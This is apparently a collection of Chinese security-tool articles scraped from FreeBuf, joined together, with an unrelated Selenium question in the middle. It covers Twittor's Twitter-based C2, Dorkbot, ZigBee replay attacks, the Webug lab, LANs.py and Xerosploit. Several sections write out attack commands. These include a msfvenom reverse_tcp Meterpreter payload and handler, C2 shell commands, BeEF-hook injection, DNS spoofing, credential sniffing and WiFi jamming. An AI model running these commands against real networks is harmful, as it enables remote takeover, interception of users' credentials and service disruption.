如何使用Twitter构建C&C服务器

如何使用Twitter构建C&C服务器

写在前面的话

社交媒体网络对于企业的市场营销团队来说,绝对是一个非常好的推广平台。如果能够正确使用它们的话,绝对可以帮助企业带来新的商机。因此,社交媒体平台(例如Twitter和Facebook)上的任何网络流量都不太可能会被屏蔽掉。但是对于渗透测试人员来说,这些社交平台可以成为命令控制工具,而网络犯罪分子甚至还可以利用社交媒体网络流量来隐藏自己的恶意行为。

工具介绍

目前,最著名的一款利用Twitter当作命令控制工具的就是Twittor了,这款工具由Paul Amar开发,而这款工具的开发灵感来自于Gcat(该工具使用Gmail作为命令控制服务器)。

这里唯一的限制条件就是,植入程序以及C2服务器都需要用户的参与以及访问令牌,而这两者都可以使用Twitter应用程序管理来生成。

如何使用Twitter构建C&C服务器

当一个新的Twitter应用被创建之后,这些值都会自动生成。控制器与主机之间的通信是通过Twitter的直接消息来进行的,因此新的应用程序将需要拥有这类消息的读取、写入和转发权限。

如何使用Twitter构建C&C服务器

植入程序是采用Python语言开发的,不过我们也可以用pyinstaller将其转换成可执行程序(exe)。需要注意的是,这款工具要求的是Python 2.7,你可以使用下列命令直接安装pyinstaller:

pip install pyinstaller
pyinstaller implant.py

当我们的植入程序执行之后,Twittor将会接收到来自目标主机的通信连接以及MAC地址。

如何使用Twitter构建C&C服务器

此时,Twittor将能够在目标主机上执行任意命令,包括在内存中执行shellcode,并获取到它已经在目标主机中执行过的命令列表。

如何使用Twitter构建C&C服务器

为了发送控制命令,Twittor还需要使用目标主机的MAC地址。

$ list_bots
E0:94:67:90:22:6C:Windows-10-10.0.15063-SP0
$ !cmd E0:94:67:90:22:6C ipconfig/all
[+] Sent command "ipconfig/all"with jobid: SPVGIpE

如何使用Twitter构建C&C服务器

命令将会通过一条Twitter的直接消息被发送至目标主机,该消息采用base64编码格式。

如何使用Twitter构建C&C服务器

由于Twittor不会对直接消息进行加密,因此解码起来也相对更加容易。发送给目标主机的消息中包含以下信息:

1.      CMD命令

2.      JobID

3.      消息发送者

4.      消息接收者的MAC地址

如何使用Twitter构建C&C服务器

命令执行后的输出可以通过retrieve指令和相关的JobID来获取。

$ !retrieve SPVGIpE

如何使用Twitter构建C&C服务器

除此之外,为了得到Meterpreter会话并利用其完整功能,我们还可以向目标主机发送shellcode。Metasploit msfvenom还可以被用来生成Python shellcode。

msfvenom -p windows/meterpreter/reverse_tcpLHOST=XXX.XXX.XXX.XXX LPORT=4444 -f python

如何使用Twitter构建C&C服务器

下面这条命令将会帮助你在目标主机上执行shellcode。

!shellcode E0:94:67:90:22:6C shellcode

下面这个Metasploit模块可以用来获取网络连接。

exploit/multi/handler

工具下载

Twittor:【点我下载

* 参考来源:pentestlab,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

基于Google搜索结果的命令行漏洞扫描工具

今天给大家介绍一款基于命令行实现的扫描工具-Dorkbot,它可以从Google的搜索结果中扫描出其中可能存在的安全漏洞。

基于Google搜索结果的命令行漏洞扫描工具

Dorkbot

Dorkbot是一款基于命令行的模块化工具,它能够对Google搜索引擎所返回的查询结果进行漏洞扫描。也就是说,它能够对搜索引擎所返回的一系列Web页面进行漏洞扫描。Dorkbot主要可以分为两套模块,即Indexers和Scanners:

1. Indexers-这个模块可以发起一次搜索请求,并将搜索引擎返回的结果作为漏洞扫描对象。

2. Scanners-这个模块能够对每一个目标(Web页面)执行漏洞扫描。

Dorkbot会将搜索到的目标保存在一个本地数据库中,接下来Dorkbot便会对目标进行漏洞扫描,Dorkbot会将任何扫描到的漏洞信息写入一份标准JSON格式的报告文件中。需要注意的是,索引和扫描过程既可以单独进行,也可以通过命令一起执行。

工具使用

usage: dorkbot.py [-h] [-c CONFIG] [-bBLACKLIST] [-d DATABASE] [-i INDEXER]
[-l] [-o INDEXER_OPTIONS] [-pSCANNER_OPTIONS] [-s SCANNER]
[-v VULNDIR]
optional arguments:
-h,--help            show this help messageand exit
-cCONFIG, --config CONFIG
Configuration file
-bBLACKLIST, --blacklist BLACKLIST
File containing (regex)patterns to blacklist from
scans
-dDATABASE, --database DATABASE
SQLite3 database file
-iINDEXER, --indexer INDEXER
Indexer module to use
-l,--list            List targets indatabase
-oINDEXER_OPTIONS, --indexer-options INDEXER_OPTIONS
Indexer-specificoptions (opt1=val1,opt2=val2,..)
-pSCANNER_OPTIONS, --scanner-options SCANNER_OPTIONS
Scanner-specificoptions (opt1=val1,opt2=val2,..)
-sSCANNER, --scanner SCANNER
Scanner module to use
-vVULNDIR, --vulndir VULNDIR
Directory to storevulnerability output reports

运行平台

Python 2.7.x / 3.x (Linux / Mac OS /Windows)

注:需要安装python-dateutil【点我下载

快速开始

1.      首先下载PhantomJS,然后将ArachniWapiti(二选一)安装在电脑中,不过你要确保已经安装好了相应的依赖组件。

2.      将每一个工具提取到工具目录下,然后把文件夹以工具名称命名,例如dorkbot/tools/phantomjs/, dorkbot/tools/arachni/等等。

3.      创建一个Google自定义搜索引擎,记录下搜索引擎ID(例如012345678901234567891:abc12defg3h)。

4.      安装python-dateutil(使用pip安装:pip install python-dateutil)

使用样例:使用arachni扫描url地址中包含字符串“id”的php页面:

$ ./dorkbot.py -i google -oengine=012345678901234567891:abc12defg3h,query="filetype:php inurl:id"-s arachni

Indexer模块

google

通过自定义搜索元素对Google自定义搜索引擎(CSE)返回的目标进行检索。

要求:PhantomJS【点我下载

选项:

1.      engine:CSE id;

2.      query:搜索语句;

3.      phantomjs_dir:基于phantomjs的目录,其中包含bin/phantomjs(默认:tools/phantomjs);

4.      domain:限制仅搜索指定域名;

stdin

以标准输入格式读取扫描目标,每次读取一行。

要求:无

选项:无

Scanner模块

arachni

使用Arachni命令行扫描器对目标进行扫描。

要求:Arachni【点我下载

选项:

1.      arachni_dir:arachni目录,其中包含bin/arachni和bin/arachni_reporter(默认:tools/arachni/);

2.      report_dir:用于保存arachni扫描信息以及JSON扫描报告的目录(默认:reports/);

3.      checks:指定需要核验的漏洞(默认:active/*,-csrf,-unvalidated_redirect,-source_code_disclosure,-response_splitting,-no_sql_injection_differential);

wapiti

使用Wapiti命令行扫描器对目标进行漏洞扫描。

要求:Wapiti【点我下载

选项:

1. wapiti_dir:wapiti目录,其中包含bin/wapiti(默认:tools/wapiti/);

2. report_dir:保存wapiti JSON扫描报告的目录(默认:reports/);

* 参考来源:dorkbot, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

ZigBee设备渗透工具:Attify Zigbee Framework

在这篇文章里,我们将向你介绍Attify Zigbee Framework -一个我们制作的图形化程序,它能帮助你渗透物联网设备且找出基于物联网以及智能设备的Zigbee漏洞。

ZigBee设备渗透工具:Attify Zigbee Framework

关于Zigbee

Zigbee是当前阶段IoT设备最常用的协议之一,它于2004年到来,之后迅速普及,成为任何需要自动化或近距离无线控制的设备的理想协议。

Zigbee额外的功能如低功耗,嵌入的对网状网络的支持以及低带宽使用,都进一步提高了这一新技术的采用率。而现今,它已经成为IoT设备(如三星Smart Things以及Philips Hue等一些十分流行的产品)中最常见的协议之一。

Zigbee联盟负责Zigbee设备的认证,并保留经过认证的产品清单。

由于没有意识到Zigbee安全的重要性,你可能经常会遇到一些丝毫没有安全保护的基于Zigbee的设备,而没有设防的后果是任何人都可以利用漏洞,甚至可以对关键基础设施进行攻击,造成的影响大到可以接管设施,小到可以嗅探传输中的敏感数据。

我们希望通过这篇文章以及其他物联网渗透工具(比如这个工具包),可以减少物联网产品的安全差距,使物联网生态系统更加健康安全。

准备

Attify ZigBee Framework是对备受赞誉的工具KillerBee的GUI封装,KillerBee由RiverLoop Security开发。

AZF(Attify ZigBee Framework)适合任何刚开始接触物联网/无线电的人,它让使用KillerBee的整个过程变得更加容易。随着时间的推移,我们计划添加更多功能并拓展框架,使其更有效地识别Zigbee通信中的漏洞。

你开始使用AZF时要做的第一件事是克隆 – Attify ZigBee Framework GitHub Repo,然后运行installer.sh安装。

ZigBee设备渗透工具:Attify Zigbee Framework

安装脚本还会安装KillerBee工具以及运行该工具所需的其他依赖。

配置工具

要运行工具,你需要前往克隆的目录,然后运行python main.py来启动Attify ZigBee Framework。

python main.py

这个框架也可以由你自定义使用的工具,为此,你可以从“设置”菜单中选择工具列表,或者使用Ctrl+S启动配置菜单。

ZigBee设备渗透工具:Attify Zigbee Framework

KillerBee框架由一些工具组成,且并不是所有这些工具已经在AZF上实现,目前,AZF包含了渗透ZigBee的一些必要的工具,未添加的将在未来版本中添加。

你可以点击这里了解更多关于KillerBee套件中的工具及其功能。

我们认为除了演示如何工作,别无更好的方法解释工作原理,所以对于这篇文章,我们将通过渗透一个现成的IoT灯泡来演示如何使用Attigit ZigBee Framework。

开始

要理解并尝试后面的教学,你可能需要以下配置:

1.ZigBee嗅探工具:你可以点击这里查看详细信息,或者点击这里购买设备(如有更好的推荐或建议,请评论)。

2.有漏洞的IoT设备

3.安装了Attify ZigBee Framework的虚拟机/系统。

完成上述要求,就可以插入Atmel RzRaven USB设备,然后启动工具,在这个演示中,我们将需要以下工具:

1.Zbid

2.Zbstumbler

3.Zbdump

4.Zbreplay

从配置菜单中选择上述工具,然后保存配置。

找到Atmel RzRaven

要开始,你只需要简单地插入Atmel RzRaven,然后Zbid面板上应该会显示已经检测到设备。Zbid面板应该如下图所示:

ZigBee设备渗透工具:Attify Zigbee Framework

现在我们已经在AZF中成功连接并检测到了RzRaven,接下来我们需要做的就是找出目标设备正在使用的信道,然后使用这些信息进行进一步的利用。

确定目标设备的信道

在2.4GHz频段,ZigBee将16个信道用于通信目的,我们最初的目标是确定目标设备正在使用的信道,而这就是Zbstumbler的用处。

Zbstumbler是用于ZigBee设备的网络发现工具。它的工作方式是发送请求帧并显示有关响应帧的信息(如果有的话)。所有这一切都是在每两秒钟在跳频时进行的。这整个过程有助于我们在16个通道中的任何一个上查找各种ZigBee设备。

如果你已经知道设备正在使用的信道,那么还可以指定在该信道上发送和接收请求和响应帧。

ZigBee设备渗透工具:Attify Zigbee Framework

如你所见,Zbstumbler在信道20上成功地发现了设备。

保存ZigBee数据包

一旦我们成功识别了信道,那么下一步就是捕获设备发送和接收的数据包。

如果你完全是个新手,那么就必须意识到很多情况下分析数据包会让我们发现很多有趣的东西,但是在这种情况,我们会捕获数据包,然后重放来使设备在行为上发生变化,这些行为由我们重放的数据包来决定。

我们可以使用工具zbdump来捕获数据包,但是要注意几个值:

1.Interface details:这个可以在Zbid获取。

2.Channel number:上述段落已经指出如何找出信道。

3.Count:这个值是可选的,它只是代表你要捕获的数据包个数,在这里,我们设置为100.

4.Output file name:输出的文件名,在这里我们保存为IoTbulb.pcap。

ZigBee设备渗透工具:Attify Zigbee Framework

重放ZigBee数据包来控制物联网设备

现在我们已经成功捕获了数据包,接下来可以进行重放 – 即所谓的重放攻击。

所有捕获的文件都存储在父文件夹Attify Zigbee Framework的pcap目录中。 zbreplay允许你从pcap目录中选择pcap文件。

继续选择我们在上一步中捕获的pcap文件,选择相应的信道,并选择重防的时间延迟。

一旦配置完毕,点击replay按钮开始重放数据包。你将看到灯泡执行的操作与在数据包捕获阶段要求执行的操作相同。

在我们的例子中,灯泡正在改变颜色,你可以从下面的视频中看到。(注释 – 在这种情况下,IoT设备没有防止重放攻击,这使我们的攻击成为可能)。

ZigBee设备渗透工具:Attify Zigbee Framework

重放攻击目前仍然是IoT设备中最常见的,基于无线电的漏洞之一,但这只是你的开始。

观看完整过程的视频

https://v.qq.com/x/page/r054621kolc.html

我们将在Attify的YouTube频道上更新更多视频。请订阅以保持更新。如果您发现错误或有任何功能请求,请随时在GitHub上联系我们。

对工具的任何贡献,无论是代码,文档,错误报告还是功能请求都将不胜感激。

*参考来源:attify,Covfefe编译,转载请注明来自FreeBuf.COM

在selenium中,如何搞定ext.js这种定位

本人想自动化出报表,在定位时,用的是id定位,测试时无问题,等使用时发现id总变,一查看才知道,报表系统使用的是Ext.js,id生成是随机的,每次不同,只好用其他定位方式了。但用其他的定位也不好定位,因为没测试工具,不可能运行一回测试一回,在网上找到一个程序,是本地运行的,把内容复制进去就可以测试定位了。
再说一下,ext.js通过不变化的id也可以定位。

XPath测试,这个程序是网上找的,怕以后用的时候不在也懒得再写一个。怕有病毒的别下。

直接用xpath定位是这样的。//*[@id=”ext-gen702″]/div/li[2]/div/a/span

现在我xpath用的是//*[@id=”form:p_acct_btn_div”]/div/div/div/ul/div/li[2]/div/a/span这样定位了。因为中间div的id值都是变化的。只好忽略,怕你让过你白。因为有些东西不好放上来,只好不截图了。

国产漏洞靶场Webug 3.0发布

webug名称定义为“我们的漏洞”靶场环境,基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于windows操作系统的漏洞所以将webug的web环境都装在了一个纯净版的windows 2003的虚拟机中。

国产漏洞靶场Webug 3.0发布

webug漏洞靶场中包含的漏洞环境:

get注入

图片破解

信息收集练习——目录端口收集

暴力破解练习

x-forwarded-for注入

支付漏洞

垂直越权

CSRF

url跳转

GET任意文件下载

POST任意文件下载

无验证上传

反射型XSS

存储型XSS

校验扩展名上传

验证来源去向的url跳转

文件包含

POST文件包含

HOST注入

APK破解

延时注入

DZ7.2论坛sql注入

aspcms注入

phpmyadmin任意文件包含漏洞

齐博系统SQL注入

海盗云商getshell

PHP168任意代码执行GET SHELL

ecshop 注入

ShopXp系统SQL注射漏洞

Dcore(轻型CMS系统)注入漏洞

MetInfo 任意文件包含漏洞可getshell

Metinfo news.php盲注

Metinfo img.php盲注

万众电子期刊在线阅读系统PHP和ASP最新版本通杀SQL注入

BEESCMS sql注入,无视防御

ourphp 注入

phpwind 命令执行漏洞

metinfo  任意用户密码修改

DZ 3.2 存储型XSS

DedeCMS flink.php友情链接注入

DedeCms?recommend.php注入

BEESCMS 小于等于V4四处注入+无需密码直接进后台

海洋 x-forwarded-for注入

php截断利用

st2-016

jboss命令执行

tomcat弱口令

hfs远程命令执行

st2-052命令执行

flash远程命令执行

gh0st远程溢出

IIS6.0远程溢出 

虚拟机纯净版系统,无任何补丁(也就是意味着附带所有windows 2003的漏洞包括 ms08-067、ms17-010、ms15-015等所有漏洞)

免责:

webug由于漏洞过多,非常不建议提取出来后搭建在真实环境中。

下载地址:

https://pan.baidu.com/s/1eRIB3Se

准备长期更新,弄了个官网:http://www.webug.org

*本文作者:小小艾_Joker,转载请注明来自 FreeBuf.COM

Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍

本文我将介绍一个新的 Burp Suite插件Handy Collaborator。Burp Suite Collaborator是添加到Burp Suite的外部服务器,主要用于挖掘那些仅来自外部服务交互的out-of-band(带外)漏洞和问题。这是一个非常实用的工具,并添加了Burp Suite Scanner的强大功能。Burp Suite Collaborator的实用性,不仅体现在自动化测试当中,在手动测试方面也表现出色。

Collaborator的用例范围举例:

1. 你不能在关键Web应用程序上使用自动化扫描器进行测试

2. 你想要重现Active Scanner发现的Collaborator问题

3. 你想要测试一个使用Base64编码的有效负载的外部服务交互的问题。而Burp Suite自动扫描器并不会帮你发现该类问题(因为它没有正确编码payload),但通过手动测试和Collaborator就能使你轻松的发现该类问题!

4. 你只需要一个外部服务器进行手动测试!

5. 等等!

Burp Suite提供了一个客户端手动使用Collaborator,但它的问题也显而易见极大的降低了手工测试的效率,因为用户需要频繁切换选项卡,为每次测试手动生成一个新的payload并且手动执行轮询(Polling)。而有了Handy Collaborator这一切的操作都将在后台完成,并且每一次交互都会被添加为一个新的issue!

Collaborator插件的使用也非常简单。下载并加载后,两个新条目将出现在Burp Suite的可编辑选项卡的上下文菜单中:

Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍

通过单击(“Insert collaborator payload”)条目,将Collaborator payload插入到选中的点((如果你点击某个点,或室选择了request某个部分,它们可以同时工作):

Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍

通过单击第二个条目(““Insert collaborator insertion point”),将在请求中插入一个自定义插入点(Intruder like)。每次执行请求时,插入点将自动替换为新生成的Collaborator payload。你还可以添加多个自定义插入点,并在每个点插入不同的Collaborator payload:

Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍

这个插件启动一个线程,它每3秒会对Collaborator服务器进行轮询。如果发现了交互,则被报告为一个Burp Suite issue:

Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍

目前,由于Burp Suite API的限制,在卸载扩展或关闭Burp Suite之后,将无法检索此扩展生成的payload相关的Collaborator交互的细节。原因在于Burp Suite 不可能保存Collaborator的上下文。但我相信这个功能会在不久的将来被添加。

你可以在Github下载到目前的最新版本:https://github.com/federicodotta/HandyCollaborator/releases

*参考来源:mediaservice,FB小编 secist 编译,转载请注明来自FreeBuf.COM

Android Studio源码扫描工具:Code Arbiter

目前Android应用代码漏洞扫描工具主要是在应用打包完成后,对应用进行解包扫描。而专门针对Android Studio中的源码进行漏洞扫描的工具则较少,且覆盖的漏洞种类不全,很难满足安全检测的需求,Android Code Arbiter就是为弥补上述缺陷而产生的。该工具依托FindBugs插件,根据Find Security Bugs为蓝本进行更改,以扩展jar包的形式在FindBugs上运行。

1、概述

该文章主要是针对工具的使用进行详细的说明,关于工具原理的说明可参见另一篇文章:Android Code Arbiter原理详解,该文章详细叙述了工具的扫描原理。

工具源码地址,打包好的jar包地址:Android-Code-Arbiter-0.8.3.jar,工具的整体架构详见下图。

Android Studio源码扫描工具:Code Arbiter

2、使用指南

2.1 安装FindBugs插件

由于该工具以FindBugs为依托,因此首先需要在Android Studio中安装FindBugs的插件。在Android Studio中找到Preferences/Plugins选项,在该复选框中通过上方搜索,或将FindBugs插件下载到本地(下载地址:FindBugs-IDEA),使用 Install plugin from disk进行安装。建议将插件下载到本地进行安装,通过搜索进行安装的插件可能版本比较陈旧,安装示意图如下所示。安装完成后需要重启Android Studio。

Android Studio源码扫描工具:Code Arbiter

2.2 安装Android Code Arbiter插件

完成FindBugs插件后,将会在Preferences/Other Settings中找到安装插件的选项FindBugs-IDEA,点击中测靠左的 + 号,在弹出的选框中选择 4.Install plugin from disk,在弹出的选框中选择下载的Android Code Arbiter的jar包,点击OK,此时会发现插件已经安装了,但是不要忘记点击右下角的Apply按钮,然后点击OK,并重启Android Studio完成插件安装。安装部分示意图,如下所示。

Android Studio源码扫描工具:Code Arbiter

3、扫描

完成安装后就可以开始扫描了,右键点击待扫描项目,在出现的复选框中找到FindBugs,在弹出的选项中选择Analyze Project Files,此时FindBugs便会自动开始对项目进行扫描了,扫描的步骤如下图所示。

Android Studio源码扫描工具:Code Arbiter

4、扫描结果展示

在Android Studio的下半部分就可以看到分析后的结果,在分析的问题中找到Android安全问题的选项,里面的内容就是插件的分析结果,如下图所示。

Android Studio源码扫描工具:Code Arbiter

5、干扰清除

5.1 清除干扰结果

由于Findbugs本身包含一些代码质量的分析,有时会对查看分析结果造成干扰,此时可以设置检测条目,只保留Android安全问题的展示,设置方法如下:

在Preferences选框中找到FindBugs-IDEA选项,选择其Detector选框,只保留Find Security Bugs检测选项,设置如下图所示,这样检测结果只会出现Android相关安全问题的检测项。

Android Studio源码扫描工具:Code Arbiter

5.2 清除检测结果

检测的结果可能存在误报,让你看起来很不舒服,此时可以手动去除检测结果。

清除单个检测结果

清除单个检测结果只需左击该检测项左侧对于的BUG图案,在弹出的选框中点击clear即可,如下图所示:

Android Studio源码扫描工具:Code Arbiter

清除所有检测结果

清除所有检测结果,只需在下方的分析栏中点击左侧的 X 号即可,如下图所示:

Android Studio源码扫描工具:Code Arbiter

*本文作者:nightmarelee,转载请注明来自 FreeBuf.COM

LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具

LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具

LANs.py功能简介

1.      自动寻找当前网络中最为活跃的WLAN用户,并对其中的一名用户实施监控,然后向该用户所访问的Web页面注入任意HTML或JavaScript代码;

2.      干扰附近的WiFi网络,干扰范围取决于无线网卡的性能。我们可以通过修改配置来实现干扰所有人的WiFi信号或仅干扰某一特定用户的WiFi信号。但是LANs.py不支持对用户同时进行WiFi干扰和监听。

依赖组件

Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如果你不知道目标用户的IP地址,那么你还需要一块支持混杂模式的无线网卡)

测试环境为Kali Linux,发动攻击的设备地址为192.168.0.5,目标设备的IP地址为192.168.0.10。

所有的可选操作项:

Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspointACCESSPOINT]

工具使用

目前该工具支持从以下协议收集数据:HTTP、FTP、IMAP、POP3和IRC。LANs.py将会打印出URL地址所返回的资源中前135个字符,并自动忽略结尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它还能够输出任意协议下传输的用户名/密码、以及接收或发送的电子邮件和IRC消息。

LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具

常用命令:

python LANs.py -u -p

其他常用命令:

python LANs.py -u -p -d -ip 192.168.0.10

-d:查看所有的图片

-ip:设置目标IP地址

HTML注入:

python LANs.py -bhttp://192.168.0.5:3000/hook.js

向目标用户所访问的页面中注入一个BeEF钩子(http://beefproject.com/,【参考教程】),注入的参数会包裹在<script>标签中,所以你可以在一个JavaScript文件中的任意位置输入内容。

python LANs.py -c'<title>Owned.</title>'

向目标用户所访问的页面中注入任意HTML代码。工具首先会尝试在第一个<head>标签之后注入内容,如果失败则尝试在第一个</head>标签之前注入内容。上面给出的示例代码会将页面标题(title)修改为’Owned.’。

读取pcap文件:

python LANs.py -pcap libpcapfilename -ip192.168.0.10

为了成功读取pcap文件中的内容,你需要使用-ip参数指定目标IP。该功能的一个优点就是用户无需使用root权限便可执行该脚本。

DNS欺骗:

python LANs.py -a -r 80.87.128.67

-a选项将会对目标发出的每一次DNS请求进行欺骗攻击,并将用户请求重定向至-r参数所制定的地址。无论用户在地址栏中输入的是什么地址,他们都将会被重定向到stallman.org(80.87.128.67)。

python LANs.py -dns eff.org

该命令将会对域名eff.org及其子域名进行DNS欺骗。

其他使用:

python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js-ip 192.168.0.10

干扰所有的WiFi网络:

python LANs.py --jam

仅干扰指定接入点:

python Lans.py --jam --accesspoint01:MA:C0:AD:DY

所有的可用选项

常规使用:

-b BEEF_HOOK_URL:将BeEF hookURL注入到目标用户所访问的每一个页面中,例如-b http://192.168.1.10:3000/hook.js

-c ‘HTML CODE’:向目标用户访问的页面中注入任意HTML代码。

-d:查看目标用户访问的图片。

-dns DOMAIN:对指定DNS域名进行DNS欺骗攻击,例如-dnsfacebook.com。

-a:对用户的所有DNS请求进行DNS欺骗攻击。

-r IPADDRESS: 仅用于-dnsDOMAIN选项。

-u:打印出目标用户所使用的URL地址。

-i INTERFACE: 指定接口,例如-i wlan0。

-ip:指定目标IP地址。

-n: 对目标执行nmap扫描。

-na:在后台对目标执行更具攻击性的nmap扫描,并将扫描结果输出到[victim IP address].nmap.txt。

-p:打印出FTP/IMAP/POP/IRC/HTTP协议下传输的用户名/密码、以及接收或发送的电子邮件和IRC消息。

-pcap PCAP_FILE: 解析pcap文件中所有的数据包; 需要输入-ip[target’s IP address]参数。

-rmac ROUTER_MAC:指定路由器的MAC地址。

-rip ROUTER_IP:指定路由器的IP地址。

–jam:对2.4GHz无线接入点以及客户端进行干扰攻击。

WiFi干扰:

-sMAC_Address_to_skip:指定需跳过的MAC地址。

-m MAXIMUM: 指定攻击客户端的最大数量。

-t TIME_INTERVAL: 设置攻击间隔。

–packets NUMBER:指定每一次攻击中发送的数据包数量。

–accesspoint ROUTER_MAC:输入目标AP的MAC地址。

* 参考来源:DanMcInerney, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

教你如何和使用这款强大的渗透平台-Xerosploit

教你如何和使用这款强大的渗透平台-Xerosploit

写在前面的话

在这篇教程中,我们将教会大家如何使用Xerosploit。Xerosploit是一款渗透测试工具包,它的主要功能就是执行中间人攻击。它本身自带有多种功能不同的模块,这些模块具有多种功能,除了中间人攻击之外,Xerosploit还可以进行端口过滤以及拒绝服务攻击。

我们可以用这款工具来执行拒绝服务攻击和中间人攻击,Xerosploit自带的功能模块还可以捕捉目标用户的图片数据,我们可以将这些模块用于注入攻击之中。毫无疑问,这是一款使用简单且功能强大的攻击平台。

下载地址

Xerosploit:【GitHub主页

工具依赖组件

nmap
hping3
build-essential
ruby-dev
libpcap-dev
libgmp3-dev
tabulate
terminaltables

工具功能

端口扫描
网络映射
DoS攻击
HTML代码注入
JavaScript代码注入
下载拦截和替换
嗅探攻击
DNS欺骗
图片替换
Drifnet
Web页面篡改

工具安装

首先,使用git命令将Xerosploit项目源码克隆到本地:

$ git clone https://github.com/LionSec/xerosploit.git

接下来,用sudo命令运行安装脚本install.py:

$ sudo python install.py

教你如何和使用这款强大的渗透平台-Xerosploit

教你如何和使用这款强大的渗透平台-Xerosploit

工具使用

安装完成之后,你需要选择你的操作系统,然后输入Xerosploit运行工具。

教你如何和使用这款强大的渗透平台-Xerosploit

输入命令‘help’之后,你可以查看到所有的可用命令。

教你如何和使用这款强大的渗透平台-Xerosploit

首先,你需要使用命令‘scan’对目标网络进行扫描,并映射出该网络内的所有设备。

教你如何和使用这款强大的渗透平台-Xerosploit

然后选择目标IP地址,并输入‘help’命令。

教你如何和使用这款强大的渗透平台-Xerosploit

你可以选择使用任意模块发动攻击,我们先使用端口扫描器pscan来进行操作演示。

教你如何和使用这款强大的渗透平台-Xerosploit

接下来,我们来尝试进行DoS攻击,为了对数据包进行检测,我们需要在发动攻击的系统中配置Wireshark。

接下来,输入命令‘back’返回主菜单,然后进入dos>>run来执行攻击。

教你如何和使用这款强大的渗透平台-Xerosploit

教你如何和使用这款强大的渗透平台-Xerosploit

现在,我们可以尝试对该网络内的其他用户进行嗅探攻击,看看他们正在查看什么图片。

教你如何和使用这款强大的渗透平台-Xerosploit

教你如何和使用这款强大的渗透平台-Xerosploit

攻击开始之后,我们就可以查看到目标用户当前正在查看的图片了。

总结

除了本文所介绍的功能之外,Xerosploit还有非常多的功能等待着大家去发现,喜欢该工具的朋友可以下载下来使用一下,我们也欢迎有编码能力的朋友为该项目贡献自己的一份力量。

免责声明

本文仅出于教育目的,读者使用该工具所进行的任何行为与FB及开发者本人没有任何关系。请大家将其用户合法目的,谢谢大家的支持!

* 参考来源:xerosploit, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

全能无线渗透测试工具,一个LAZY就搞定了

近来一直在研究无线安全方面的东西,特别是在无线渗透测试这块,每次渗透测试时总要来回不停的切换操作和挑选利器,很是麻烦。就想看看是否可以有一款功能全面的集合型工具。

正所谓功夫不负有心人,还真有这么一个工具出现在我的眼前。它便是名为LAZY script应用于Kali Linux下的执行脚本。该脚本可以自动执行有关Wi-Fi穿透和黑客攻击的绝大部分应用程序,同时它还集合了大量不同类型的攻击程序,可谓是集众家之长于一身。这么好的东西,必须和各位小伙伴一起分享。

其实,这样一款好的工具,不仅可以让从事日常安全工作研究变得得心应手,同时对提高无线安全方面的相关学习提供了极大便利。特别是它在使用中可以借助自定义键盘快捷键,只要在lscript中启动任何工具,均可以使用自己此前设定好的快捷方式。

当然LAZY script还能快速变更MAC地址,只要使用它里面的禁用界面功能即可,让自己的匿名操作更加快捷。另外,它还可以意见查看自己的公共IP地址信息、MAC地址信息等操作。在Wi-Fi密码脚本方面支持的也比较全面,如Handshake(WPA-WPA2)、Find WPS PIN(WPA-WPA2)、WEP hacking(WEP)等。

经过上述简单介绍,看官们一定对LAZY script这个工具产生兴趣了吧,下面我们开始详细展示。

首先,我们在命令界面下执行程序下载。

下载克隆链接:git clone https://github.com/arismelachroinos/lscript.git

待程序下载完毕后,开始执行启动安装命令:cd /opt/lscript

当然,在安装过程中我们可能会遇到一个小难题,那就是权限限制,需要进行调整,此时我们就需要用到这条命令:chmod +x install.sh

待权限调整完毕后,正式执行安装:./install.sh

全能无线渗透测试工具,一个LAZY就搞定了

这便是安装前脚本工具下载状态所显示的进度图

全能无线渗透测试工具,一个LAZY就搞定了

执行安装命令展示

全能无线渗透测试工具,一个LAZY就搞定了

系统会在安装开始时给予一段有关权限限制的说明内容,这也是为什么会有权限调整的命令出现。

全能无线渗透测试工具,一个LAZY就搞定了

此时,系统会蹦出一段提示语,主要的意思是询问我们是对程序进行安装(i选项),还是选择升级(u选项),此时我们选择i安装。

全能无线渗透测试工具,一个LAZY就搞定了

系统会再次询问,我们是否继续执行安装,此时选择yes即可。

全能无线渗透测试工具,一个LAZY就搞定了

程序安装完毕后,会提示我们直接打开一个新的终端输入小写“L”命令,便可以直接加载运行程序脚本,键入ks可以对自己所需要的快捷方式进行设置。

全能无线渗透测试工具,一个LAZY就搞定了

启动程序后首先看到的快捷提示界面。

既然程序已经安装完毕,并且可以正常启动,那么我们接下来就进入运行和测试阶段,主要来一起体验下LAZY script的功能及使用情况。查看无线适配器信息,并启动wlan0适配器。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

启动一个新的控制台,并输入“l”运行程序,很快系统反馈给我们接受说明条款的内容。

全能无线渗透测试工具,一个LAZY就搞定了

在我们接受条款过后,系统会奉上程序使用声明内容。

全能无线渗透测试工具,一个LAZY就搞定了

全能无线渗透测试工具,一个LAZY就搞定了

